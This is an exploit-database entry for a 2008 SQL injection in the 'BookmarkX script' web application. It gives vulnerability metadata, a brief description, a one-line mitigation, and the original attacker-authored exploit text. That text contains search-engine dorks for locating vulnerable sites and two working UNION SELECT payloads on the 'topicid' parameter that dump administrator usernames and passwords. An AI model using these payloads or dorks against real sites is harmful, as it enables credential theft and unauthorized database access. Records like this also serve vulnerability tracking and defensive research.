BookmarkX script(Powered by GengoliaWebStudio)SQL Injection

vendor:

BookmarkX script

by:

S@BUN

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: BookmarkX script

Affected Version From: 2007 BookmarkX script

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

BookmarkX script(Powered by GengoliaWebStudio)SQL Injection

An attacker can exploit this vulnerability by sending a crafted SQL query to the vulnerable application. The crafted query can be sent as a part of the URL parameter 'topicid' and can be used to extract sensitive information from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

#########################################################################
#
# BookmarkX script(Powered by GengoliaWebStudio)SQL Injection
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/
#
#########################################################################
# DorKs 1 : "2007 BookmarkX script"
#
# DORKS 2 : Powered by GengoliaWebStudio
#
# DORK 3 : allinurl :"index.php?menu=showtopic"
#
#########################################################################
# EXPLOIT :
#
index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6/**/FROM/**/admin/*%20admin=1

or

index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6,7/**/FROM/**/admin/*%20admin=1
##########################################################################
# S@BUN                   www.hackturkiye.com                     S@BUN #########################################################################
#########################################################################
# S@BUN                    GOOD LUCKY                              S@BUN
#########################################################################

# milw0rm.com [2008-02-02]